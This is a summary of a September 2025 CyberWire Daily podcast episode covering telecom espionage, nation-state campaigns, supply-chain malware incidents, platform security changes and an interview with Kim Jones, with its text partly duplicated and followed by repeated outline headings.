CyberWire Daily: Espionage in the Airwaves

Podcast Date: September 23, 2025
Host: Dave Buettner (N2K Networks)

Episode Overview

This episode centers on a sweeping array of current cybersecurity news, with a sharp focus on state-sponsored and criminal espionage activities exploiting telecommunications networks (“espionage in the airwaves”), and supply chain attacks impacting both industries and consumers. The episode features expert commentary—including an in-depth interview with Kim Jones, host of the CISO Perspectives podcast—on trends, threats, and strategies being employed in the evolving threat landscape.

Key Stories & Insights

1. Clandestine Communications Network Dismantled

[00:40 – 04:50]

What Happened:
The US Secret Service dismantled a secret communications network in the New York region, discovered especially as world leaders gathered for the UN General Assembly.
Operations Details:
- Over 100,000 SIM cards and 300 servers seized within 35 miles of UN HQ.
- Capabilities: Sending 30 million texts per minute, anonymous encrypted comms, and potentially disabling New York’s cellular network.
- Alleged operation tied to at least one foreign nation and known criminals (including cartel members).
- No direct evidence it aimed at disrupting the UN event, but timing and proximity raised concerns of state-backed espionage.
Ongoing Risk:
- Multiple agencies on the case, warning of similar systems possibly elsewhere.
Notable Quote:

“These devices allowed anonymous encrypted communications between potential threat actors and criminal enterprises enabling criminal organizations to operate undetected... This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool (Special Agent in Charge, Secret Service NY Field Office) [03:39]
Memorable Moment:
The described ability to send 30 million texts per minute and disrupt emergency services underscores unprecedented sophistication and scale—signaling the convergence between nation-state and criminal interests.

2. Jaguar Land Rover Cyberattack Fallout

[04:50 – 06:01]

Prolonged plant shutdown (extended until Oct 1); operational losses estimated at $2.9 billion revenue and $202 million profit.
Company working with UK’s NCSC and law enforcement—focus on secure restart.
Lack of adequate cyber insurance deepens risks.
Impact: Layoffs in the supply chain, threats to local businesses, and concerns about a major crisis if no government support materializes.

3. EU Tech Giants Probe: Fighting Online Fraud

[06:01 – 07:20]

EU issues formal information requests to Apple, Google, Microsoft, and Booking under the Digital Services Act.
Scrutiny on fraudulent apps, manipulated searches, and fake listings.
Fines could reach 6% of global revenue for noncompliance.

4. Espionage Campaigns by Nation-State Actors

Iranian APT “Nimbus Manticore” Steps Up Attacks

[07:20 – 08:40]

Targets: European defense, telecom, aviation sectors (notably Denmark, Sweden, Portugal).
Tactics:
- Spear phishing via fake recruiter profiles, custom credential tracking.
- DLL sideloading, tools like Mini Junk Backdoor and minibrowse Stealer.
- Advanced code signing, obfuscation, and infrastructure resilience.
Analyst Take: Reflects a “mature, well-resourced adversary aligned with Iran’s strategic priorities.”

North Korean “Kim Suki” Shortcut-based Espionage

[08:41 – 10:17]

How It Works:
- Archive files disguised as official docs lure victims into running shortcut files, executing a hidden payload.
- Harvests: Browser data, crypto wallets, Telegram sessions, keystrokes, certificates.
Technical Traits: Advanced obfuscation, persistence, evasion of VMs, reflective DLL injection.
Big Picture: Indicates highly covert intelligence collection and credential theft campaign.

5. Software Supply Chain Attacks & Defenses

[10:17 – 13:21]

GitHub Security Upgrades

Two-factor authentication for local publishing, stricter token policies, deprecation of old methods.
Impetus: Large-scale attacks (Singularity, Ghost Action, Shy Hulude) compromised thousands of accounts.
Moving toward stronger platform safeguards and more “active developer participation.”

Ruby Central Tightens Controls

Responding to malicious gem campaigns: Limiting admin access during transition to a transparent, community-driven model.

Malicious Packages in the Wild

FezBox NPM Package: Used QR codes hiding obfuscated malware, stealing browser cookies and credentials (at least 327 downloads).
- Encrypted payloads and anti-detection techniques illustrate advanced supply chain risk.

LastPass macOS “Clickfix” Campaign

Fake GitHub repos impersonating over 100 popular apps (e.g., 1Password, Dropbox) push “atomic stealer” malware.
SEO and automated repo creation make defense difficult.
Advice: Download only from official vendors.

6. Evolving Tactics of State-Backed Hackers

[13:22 – 15:10]

AT&T CISO Warning:
- Hackers mimic China’s Salt Typhoon group:
  - Targeting systems outside classic EDR coverage,
  - Exploiting platforms with limited logging,
  - Living-off-the-land with legitimate admin tools for stealth and persistence.
- Stronger cyber defenses are forcing adversaries to chain exploits and innovate.
NSA’s Rob Joyce:
- Chained exploits and new stealth measures are the response to defensive improvements.
Key Quote:

“Defenders must adapt, expanding protections beyond conventional endpoints and anticipating how attackers may turn everyday tools into attack vectors.”

Interview Segment: CISO Perspectives Podcast with Kim Jones

[15:53 – 22:29]

Season Preview and Strategic Themes

Mindset Shift:
Kim Jones advocates for cyber leaders to “take a half step back”—away from constant firefighting—to reflect and strategize about the exponentially changing risk landscape.
Season Tagline:

“If I were to put a tagline on it, I wanted to look at Brave New World—with apologies to either Huxley or Shakespeare...”
—Kim Jones [16:16]
Primary Forces Shaping the Landscape:
- Pandemic & Hybrid Work: Security and compliance models have struggled to keep pace with remote and hybrid arrangements.
- AI Evolution: From generative AI to “agentic AI” changing data analytics and raising privacy risks.
- Regulatory Shifts: Data use and privacy now scrutinized by regulators, with risk of creating new dangers for individuals.
- Quantum Computing: The “next wave” that could disrupt encryption.
- Fraud, Scams & Identity Threats: Deepfakes, vishing, and credential theft rise with increased sophistication.
- Online Identity: The fragility of verifying identity in a world of deepfakes and voice phishing.
Learning Focus:
This season, Jones emphasizes less self-opinion and more genuine inquiry—“mutual learning” with deep experts, fostering audience understanding as he learns himself.

“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]
Audience Proxy:

“Yes, absolutely. That's why there's going to be less of Kim talking and... more of a hey, this is why this is probably something you ought to look at very briefly. Then I'm sitting there asking the questions that I would presume, if not hope, that my audience members would be asking...”
—Kim Jones [21:17]
First Guest & Episode:
Ben Yellen launches season one, discussing “the shifting relationship of regulation and private sector for cyber under this new world order.” [21:54]

Notable Quotes & Moments

Espionage Scale:

“This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool, Secret Service [03:39]
Leadership Reflection:

“We all understand that change is the only constant out there and we've seen massive amounts of changes just in my 35 years doing this, but just in the past five years...”
—Kim Jones [16:22]
Learning Approach:

“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]

Other Brief Highlights

California Lawyer Fined $10,000 for AI “Hallucinations”
- Attorney Amir Mostafavi cited 21 out of 23 cases incorrectly in a court filing, relying on AI-generated content without fact-checking.
- Judge issued a stern warning: “...delegating due diligence to a chatbot is not a winning defense.” [24:20]

Closing Thoughts

This episode underscores the persistently high stakes of modern cyber conflict, including espionage at the infrastructure level, the delicate and dynamic interplay between regulators and technology giants, and the rapidly evolving tactics of advanced threat groups. The preview of CISO Perspectives signals a season focused on learning and preparedness in a period of historic change.

CyberWire Daily: Espionage in the Airwaves

Podcast Date: September 23, 2025
Host: Dave Buettner (N2K Networks)

Episode Overview

Key Stories & Insights

1. Clandestine Communications Network Dismantled

[00:40 – 04:50]

What Happened:
The US Secret Service dismantled a secret communications network in the New York region, discovered especially as world leaders gathered for the UN General Assembly.
Operations Details:
- Over 100,000 SIM cards and 300 servers seized within 35 miles of UN HQ.
- Capabilities: Sending 30 million texts per minute, anonymous encrypted comms, and potentially disabling New York’s cellular network.
- Alleged operation tied to at least one foreign nation and known criminals (including cartel members).
- No direct evidence it aimed at disrupting the UN event, but timing and proximity raised concerns of state-backed espionage.
Ongoing Risk:
- Multiple agencies on the case, warning of similar systems possibly elsewhere.
Notable Quote:

“These devices allowed anonymous encrypted communications between potential threat actors and criminal enterprises enabling criminal organizations to operate undetected... This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool (Special Agent in Charge, Secret Service NY Field Office) [03:39]
Memorable Moment:
The described ability to send 30 million texts per minute and disrupt emergency services underscores unprecedented sophistication and scale—signaling the convergence between nation-state and criminal interests.

2. Jaguar Land Rover Cyberattack Fallout

[04:50 – 06:01]

Prolonged plant shutdown (extended until Oct 1); operational losses estimated at $2.9 billion revenue and $202 million profit.
Company working with UK’s NCSC and law enforcement—focus on secure restart.
Lack of adequate cyber insurance deepens risks.
Impact: Layoffs in the supply chain, threats to local businesses, and concerns about a major crisis if no government support materializes.

3. EU Tech Giants Probe: Fighting Online Fraud

[06:01 – 07:20]

EU issues formal information requests to Apple, Google, Microsoft, and Booking under the Digital Services Act.
Scrutiny on fraudulent apps, manipulated searches, and fake listings.
Fines could reach 6% of global revenue for noncompliance.

4. Espionage Campaigns by Nation-State Actors

Iranian APT “Nimbus Manticore” Steps Up Attacks

[07:20 – 08:40]

Targets: European defense, telecom, aviation sectors (notably Denmark, Sweden, Portugal).
Tactics:
- Spear phishing via fake recruiter profiles, custom credential tracking.
- DLL sideloading, tools like Mini Junk Backdoor and minibrowse Stealer.
- Advanced code signing, obfuscation, and infrastructure resilience.
Analyst Take: Reflects a “mature, well-resourced adversary aligned with Iran’s strategic priorities.”

North Korean “Kim Suki” Shortcut-based Espionage

[08:41 – 10:17]

How It Works:
- Archive files disguised as official docs lure victims into running shortcut files, executing a hidden payload.
- Harvests: Browser data, crypto wallets, Telegram sessions, keystrokes, certificates.
Technical Traits: Advanced obfuscation, persistence, evasion of VMs, reflective DLL injection.
Big Picture: Indicates highly covert intelligence collection and credential theft campaign.

5. Software Supply Chain Attacks & Defenses

[10:17 – 13:21]

GitHub Security Upgrades

Two-factor authentication for local publishing, stricter token policies, deprecation of old methods.
Impetus: Large-scale attacks (Singularity, Ghost Action, Shy Hulude) compromised thousands of accounts.
Moving toward stronger platform safeguards and more “active developer participation.”

Ruby Central Tightens Controls

Responding to malicious gem campaigns: Limiting admin access during transition to a transparent, community-driven model.

Malicious Packages in the Wild

FezBox NPM Package: Used QR codes hiding obfuscated malware, stealing browser cookies and credentials (at least 327 downloads).
- Encrypted payloads and anti-detection techniques illustrate advanced supply chain risk.

LastPass macOS “Clickfix” Campaign

Fake GitHub repos impersonating over 100 popular apps (e.g., 1Password, Dropbox) push “atomic stealer” malware.
SEO and automated repo creation make defense difficult.
Advice: Download only from official vendors.

6. Evolving Tactics of State-Backed Hackers

[13:22 – 15:10]

AT&T CISO Warning:
- Hackers mimic China’s Salt Typhoon group:
  - Targeting systems outside classic EDR coverage,
  - Exploiting platforms with limited logging,
  - Living-off-the-land with legitimate admin tools for stealth and persistence.
- Stronger cyber defenses are forcing adversaries to chain exploits and innovate.
NSA’s Rob Joyce:
- Chained exploits and new stealth measures are the response to defensive improvements.
Key Quote:

“Defenders must adapt, expanding protections beyond conventional endpoints and anticipating how attackers may turn everyday tools into attack vectors.”

Interview Segment: CISO Perspectives Podcast with Kim Jones

[15:53 – 22:29]

Season Preview and Strategic Themes

Mindset Shift:
Kim Jones advocates for cyber leaders to “take a half step back”—away from constant firefighting—to reflect and strategize about the exponentially changing risk landscape.
Season Tagline:

“If I were to put a tagline on it, I wanted to look at Brave New World—with apologies to either Huxley or Shakespeare...”
—Kim Jones [16:16]
Primary Forces Shaping the Landscape:
- Pandemic & Hybrid Work: Security and compliance models have struggled to keep pace with remote and hybrid arrangements.
- AI Evolution: From generative AI to “agentic AI” changing data analytics and raising privacy risks.
- Regulatory Shifts: Data use and privacy now scrutinized by regulators, with risk of creating new dangers for individuals.
- Quantum Computing: The “next wave” that could disrupt encryption.
- Fraud, Scams & Identity Threats: Deepfakes, vishing, and credential theft rise with increased sophistication.
- Online Identity: The fragility of verifying identity in a world of deepfakes and voice phishing.
Learning Focus:
This season, Jones emphasizes less self-opinion and more genuine inquiry—“mutual learning” with deep experts, fostering audience understanding as he learns himself.

“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]
Audience Proxy:

“Yes, absolutely. That's why there's going to be less of Kim talking and... more of a hey, this is why this is probably something you ought to look at very briefly. Then I'm sitting there asking the questions that I would presume, if not hope, that my audience members would be asking...”
—Kim Jones [21:17]
First Guest & Episode:
Ben Yellen launches season one, discussing “the shifting relationship of regulation and private sector for cyber under this new world order.” [21:54]

Notable Quotes & Moments

Espionage Scale:

“This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool, Secret Service [03:39]
Leadership Reflection:

“We all understand that change is the only constant out there and we've seen massive amounts of changes just in my 35 years doing this, but just in the past five years...”
—Kim Jones [16:22]
Learning Approach:

“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]

Other Brief Highlights

California Lawyer Fined $10,000 for AI “Hallucinations”
- Attorney Amir Mostafavi cited 21 out of 23 cases incorrectly in a court filing, relying on AI-generated content without fact-checking.
- Judge issued a stern warning: “...delegating due diligence to a chatbot is not a winning defense.” [24:20]

Espionage in the airwaves.

Summary

CyberWire Daily: Espionage in the Airwaves

Episode Overview

Key Stories & Insights

1. Clandestine Communications Network Dismantled

2. Jaguar Land Rover Cyberattack Fallout

3. EU Tech Giants Probe: Fighting Online Fraud

4. Espionage Campaigns by Nation-State Actors

Iranian APT “Nimbus Manticore” Steps Up Attacks

North Korean “Kim Suki” Shortcut-based Espionage

5. Software Supply Chain Attacks & Defenses

GitHub Security Upgrades

Ruby Central Tightens Controls

Malicious Packages in the Wild

LastPass macOS “Clickfix” Campaign

6. Evolving Tactics of State-Backed Hackers

Interview Segment: CISO Perspectives Podcast with Kim Jones

Season Preview and Strategic Themes

Notable Quotes & Moments

Other Brief Highlights

Closing Thoughts

Summary

CyberWire Daily: Espionage in the Airwaves

Episode Overview

Key Stories & Insights

1. Clandestine Communications Network Dismantled

2. Jaguar Land Rover Cyberattack Fallout

3. EU Tech Giants Probe: Fighting Online Fraud

4. Espionage Campaigns by Nation-State Actors

Iranian APT “Nimbus Manticore” Steps Up Attacks

North Korean “Kim Suki” Shortcut-based Espionage

5. Software Supply Chain Attacks & Defenses

GitHub Security Upgrades

Ruby Central Tightens Controls

Malicious Packages in the Wild

LastPass macOS “Clickfix” Campaign

6. Evolving Tactics of State-Backed Hackers

Interview Segment: CISO Perspectives Podcast with Kim Jones

Season Preview and Strategic Themes

Notable Quotes & Moments

Other Brief Highlights

Closing Thoughts